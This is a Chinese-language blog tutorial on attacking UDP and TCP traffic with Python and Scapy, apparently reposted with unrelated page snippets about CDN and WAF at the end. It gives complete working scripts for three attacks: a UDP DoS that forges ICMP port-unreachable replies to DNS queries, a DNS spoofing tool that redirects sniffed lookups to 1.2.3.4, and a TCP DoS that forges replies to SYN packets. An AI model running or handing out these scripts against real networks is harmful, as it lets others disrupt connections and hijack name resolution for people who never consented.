摘要:部分來自網(wǎng)絡(luò),適用于學(xué)習(xí),維護(hù)網(wǎng)絡(luò)安全,做合法公民一和不同,沒有面向連接的機(jī)制,其是一種不可靠的協(xié)議,沒有確認(rèn)機(jī)制。
部分來自網(wǎng)絡(luò),適用于學(xué)習(xí),維護(hù)網(wǎng)絡(luò)安全,做合法公民
一、UDP和TCP不同,UDP沒有面向連接的機(jī)制,其是一種不可靠的協(xié)議,沒有確認(rèn)機(jī)制。也就是說只要其端口開放,有數(shù)據(jù)需要交互時直接進(jìn)行數(shù)據(jù)交互,也不需要TCP的三次握手。這樣的話,基于UDP的攻擊比基于TCP的攻擊需要分析的條件相對少了一些。
下面是Python實現(xiàn)過程:
1、配置環(huán)境本人使用的是Win7 64位系統(tǒng),Python2.7.9,Scapy2.3.3(Python版本必須>=2.7.9,因為Scapy其它版本缺少模塊)。
安裝Python后,下載 setuptools-36.2.0 ,解壓到任意目錄下,運(yùn)行:
運(yùn)行成功后,會生成Script目錄,里面就是下載Python模塊的工具了:
接下來我們安裝Scapy2.3.3:
以上我們就將環(huán)境配置好了。
2、安裝抓包工具 WiresharkWireshark使用起來很簡單,這里不做過多介紹。抓包工具有很多,下面介紹幾款流行抓包工具:Wireshark、Fiddler(可抓取網(wǎng)站或手機(jī)數(shù)據(jù)包,可支持Https)、Burpsuite、tcpdump(Linux自帶工具)、airodump-ng(Wifi滲透,可顯示路由器的BSSID ESSID,以及所有連接的客戶端。但需要一款可監(jiān)聽注入的網(wǎng)卡)等等。
運(yùn)行Wireshark,點擊監(jiān)聽的網(wǎng)絡(luò):
接下來我們 ping www.baidu.com 會抓到什么包?
上圖依次為DNS域名查詢請求與響應(yīng),成功返回ip。以上就是一次DNS域名解析的過程。
查詢網(wǎng)卡詳細(xì)信息:
3、實施攻擊3.1、UDP DOS
因為UDP是無連接的,同一個連接中的報文與前面或后面的報文都沒有直接關(guān)系。因此對其DOS攻擊不像TCP那樣只需要發(fā)送一個reset包就可以干掉一個TCP連接那樣簡單,針對UDP的DOS需要將每個報文都DOS掉,不然應(yīng)用層的重傳機(jī)制還是會重傳相應(yīng)數(shù)據(jù)以保持會話與交互的數(shù)據(jù)完整。因此針對UDP的DOS攻擊一般情況下都是針對UDP的輕量化應(yīng)用進(jìn)行攻擊,如DNS這種小量交互的報文,而不是P2P這種大量報文交互的應(yīng)用。
因此對其進(jìn)行DOS非常簡單,只需要監(jiān)聽網(wǎng)絡(luò)中的DNS流量,有DNS查詢時,直接返回一個ICMP Port unreachable報文即可,表示端口沒有開放。若為TCP的應(yīng)用,其端口沒有開放時,一般回應(yīng)一個reset報文。并且有一點一定要保證,就是ICMP port unreachable報文一定要比正常的DNS 響應(yīng)報文早到客戶端,這樣才可以達(dá)到DOS的效果。
部分代碼做了注釋:
#!/usr/bin/python # -*- coding: utf-8 -*- import random from scapy.all import * from scapy.arch.windows import compatibility # 防止scapy2.3.3版本中出現(xiàn)log_runtime錯誤 compatibility.log_runtime = log_runtime compatibility.MTU = MTU compatibility.PcapTimeoutElapsed = PcapTimeoutElapsed compatibility.ETH_P_ALL = ETH_P_ALL compatibility.plist = plist compatibility.sniff(1) conf.iface = "Intel(R) Ethernet Connection I217-LM" # 綁定網(wǎng)卡,替換成之前所保存的網(wǎng)卡信息,linux需在sniff()中指定網(wǎng)卡 # DNS響應(yīng)的地址,隨機(jī)ip字段的id和ttl ipid = random.randint(1,65535) ipttl = random.randint(45,80) def buying(mots): resp = Ether()/IP()/ICMP()/IP()/UDP() #構(gòu)造ICMP報文 resp[ICMP].type = 3 resp[ICMP].code = 3 resp[ICMP][IP].src = mots[IP].src resp[ICMP][IP].dst = mots[IP].dst resp[ICMP][IP].ttl = ipttl resp[ICMP][IP].id = ipid resp[ICMP][UDP].sport = mots[UDP].sport resp[ICMP][UDP].dport = mots[UDP].dport #構(gòu)造IP包頭 resp[IP].src = mots[IP].dst resp[IP].dst = mots[IP].src resp[IP].ttl = ipttl resp[IP].id = ipid #構(gòu)造以太網(wǎng)包頭 resp[Ether].src = mots[Ether].dst resp[Ether].dst = mots[Ether].src #發(fā)送構(gòu)造的ICMP響應(yīng)包 sendp(resp, count = 100) if __name__ == "__main__": print "start sniff" sniff(prn=buying, filter="udp dst port 53") # 嗅探,過濾upd目標(biāo)端口53
命令行運(yùn)行Python程序,然后再次 ping www.baidu.com,出現(xiàn)以下情況:
由于DNS使用UDP,而UDP是一種不可靠的協(xié)議,其存在丟包的可能,因此DNS為了保證應(yīng)用的可靠性,一般的DNS查詢都是發(fā)送多個,當(dāng)前面一個查詢失敗時,會繼續(xù)發(fā)送DNS查詢報文。如果第一個DNS查詢被DOS了,但是第二個DNS時卻被正常響應(yīng)了。所以導(dǎo)致DNS結(jié)果還是正常的。
3.2、UDP 欺騙
很簡單,在監(jiān)聽到客戶端發(fā)送請求時,發(fā)送一個偽造的響應(yīng),并且比正常的響應(yīng)早到,這樣即可達(dá)到欺騙的效果。實際攻擊還是攻擊輕量化的應(yīng)用,流量較大的攻擊效果不一定明顯,且成本很大。還是以DNS為測試目標(biāo)吧。DNS污染在運(yùn)營商里做的比較多,原理很簡單:利益。并且其實現(xiàn)起來具有天然優(yōu)勢,可以在關(guān)鍵鏈路和節(jié)點進(jìn)行分光監(jiān)聽并發(fā)送偽造的數(shù)據(jù)包。
#!/usr/bin/python # -*- coding: utf-8 -*- import random from scapy.all import * from scapy.arch.windows import compatibility # 防止scapy2.3.3版本中出現(xiàn)log_runtime錯誤 compatibility.log_runtime = log_runtime compatibility.MTU = MTU compatibility.PcapTimeoutElapsed = PcapTimeoutElapsed compatibility.ETH_P_ALL = ETH_P_ALL compatibility.plist = plist compatibility.sniff(1) conf.iface = "Intel(R) Ethernet Connection I217-LM" # 綁定網(wǎng)卡,linux需在sniff()中指定網(wǎng)卡 # DNS響應(yīng)的地址,隨機(jī)ip字段的id和ttl rdata = "1.2.3.4" ipid = random.randint(1,65535) ipttl = random.randint(45,80) def buying(mots): resp = Ether()/IP()/UDP()/DNS() #構(gòu)造DNS相關(guān)字段 resp[DNS].qr = 1 resp[DNS].rd = 1 resp[DNS].qdcount = 1 resp[DNS].ancount = 1 resp[DNS].id = mots[DNS].id resp[DNS].qd = mots[DNS].qd resp[DNS].an = DNSRR(type="A",rclass="IN",ttl=1800,rdata=rdata) resp[DNS].an.rrname = mots[DNS].qd.qname #構(gòu)造UDP相關(guān)字段 resp[UDP].dport = mots[UDP].sport resp[UDP].sport = mots[UDP].dport #構(gòu)造IP包頭 resp[IP].src = mots[IP].dst resp[IP].dst = mots[IP].src resp[IP].ttl = ipttl resp[IP].id = ipid #構(gòu)造以太網(wǎng)包頭 resp[Ether].src = mots[Ether].dst resp[Ether].dst = mots[Ether].src #發(fā)送構(gòu)造的DNS響應(yīng)包 sendp(resp) print("DNS響應(yīng)為:",mots[DNS].qd.qname,"->",rdata) if __name__ == "__main__": print "start sniff" sniff(prn=buying,filter="udp dst port 53")
命令行運(yùn)行Python程序,然后再次 ping www.baidu.com,出現(xiàn)以下情況:
以上就成功進(jìn)行了UDP欺騙,將百度重定向到1.2.3.4上。
二、TCP比如探測某一端口是否開放時,一般發(fā)送SYN,若其端口開放,對方回應(yīng)SYN+ACK;若端口不開放,則回應(yīng)reset。所以針對TCP的應(yīng)用,我們進(jìn)行DOS時,可以監(jiān)聽其SYN包,一旦有客戶端發(fā)送SYN,直接給其回應(yīng)reset,并且保證偽造的reset比正常的響應(yīng)包早到,即可達(dá)到DOS的效果。
1、配置環(huán)境與UDP配置相同
2、實施攻擊2.1、TCP DOS
#!/usr/bin/python # -*- coding: utf-8 -*- import random from scapy.all import * from scapy.arch.windows import compatibility # 防止scapy2.3.3版本中出現(xiàn)log_runtime錯誤 compatibility.log_runtime = log_runtime compatibility.MTU = MTU compatibility.PcapTimeoutElapsed = PcapTimeoutElapsed compatibility.ETH_P_ALL = ETH_P_ALL compatibility.plist = plist compatibility.sniff(1) conf.iface = "Intel(R) Ethernet Connection I217-LM" # 綁定網(wǎng)卡,linux需在sniff()中指定網(wǎng)卡 #隨機(jī)ip字段的id和ttl ipid = random.randint(1,65535) ipttl = random.randint(45,80) tcpseq = random.randint(1,4294967295) def buying(tcpmots): resp = Ether()/IP()/TCP() #構(gòu)造TCP相關(guān)字段 resp[TCP].dport = tcpmots[TCP].sport resp[TCP].sport = tcpmots[TCP].dport resp[TCP].ack = 0 # ack大小可以任意指定 resp[TCP].flags = "SA" resp[TCP].window = 0 # 構(gòu)造IP包頭 resp[IP].src = tcpmots[IP].dst resp[IP].dst = tcpmots[IP].src resp[IP].ttl = ipttl resp[IP].id = ipid #構(gòu)造以太網(wǎng)包頭 resp[Ether].src = tcpmots[Ether].dst resp[Ether].dst = tcpmots[Ether].src #發(fā)送構(gòu)造的TCP DOS 包 sendp(resp,count=1) print("TCP DOS 攻擊",resp[IP].dst,"成功") if __name__ == "__main__": print "start sniff" sniff(prn=buying,filter="tcp[tcpflags]&(tcp-syn)!=0 and tcp[tcpflags]&(tcp-ack)==0")
運(yùn)行以上代碼:
大家實驗可能失敗的因素有很多,比如對DNS進(jìn)行了加密、采用DNS延遲解析、網(wǎng)絡(luò)不穩(wěn)定都會對攻擊產(chǎn)生一定影響,不是每次攻擊都會成功,這點希望大家能注意到。
文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。
轉(zhuǎn)載請注明本文地址:http://systransis.cn/yun/40633.html
摘要:在一個節(jié)點中,設(shè)備和本地負(fù)載均衡設(shè)備的連接方式有兩種一種是旁路方式,一種是穿越方式。 文章同步于Github Pines-Cheng/blog 什么是CDN CDN(內(nèi)容分發(fā)網(wǎng)絡(luò))全稱是 Content Delivery Network,建立并覆蓋在承載網(wǎng)之上、由分布在不同區(qū)域的邊緣節(jié)點服務(wù)器群組成的分布式網(wǎng)絡(luò),替代傳統(tǒng)以 WEB Server 為中心的數(shù)據(jù)傳輸模式。 作用是將源內(nèi)容發(fā)...
摘要:在一個節(jié)點中,設(shè)備和本地負(fù)載均衡設(shè)備的連接方式有兩種一種是旁路方式,一種是穿越方式。 文章同步于Github Pines-Cheng/blog 什么是CDN CDN(內(nèi)容分發(fā)網(wǎng)絡(luò))全稱是 Content Delivery Network,建立并覆蓋在承載網(wǎng)之上、由分布在不同區(qū)域的邊緣節(jié)點服務(wù)器群組成的分布式網(wǎng)絡(luò),替代傳統(tǒng)以 WEB Server 為中心的數(shù)據(jù)傳輸模式。 作用是將源內(nèi)容發(fā)...
摘要:為使用七層負(fù)載均衡的用戶,提供安全高效的應(yīng)用防護(hù)能力?;谪?fù)載均衡集群的運(yùn)維能力,可快速進(jìn)行擴(kuò)容容災(zāi)遷移的部署。伴隨著互聯(lián)網(wǎng)+時代的到來,Web系統(tǒng)作為企業(yè)IT業(yè)務(wù)的基本負(fù)載平臺,承載著各種不同種類的信息業(yè)務(wù)。但近年來針對Web應(yīng)用的攻擊事件頻發(fā),也讓W(xué)eb應(yīng)用的安全防御面臨著諸多挑戰(zhàn)。國家互聯(lián)網(wǎng)應(yīng)急中心報告就曾顯示,僅2020上半年國家信息安全漏洞共享平臺(CNVD)收錄通用型安全漏洞11...
閱讀 2590·2021-08-20 09:38
閱讀 1367·2019-08-30 15:43
閱讀 606·2019-08-29 17:13
閱讀 1615·2019-08-29 14:01
閱讀 1325·2019-08-29 13:29
閱讀 2347·2019-08-23 18:29
閱讀 2058·2019-08-23 17:51
閱讀 1928·2019-08-23 17:16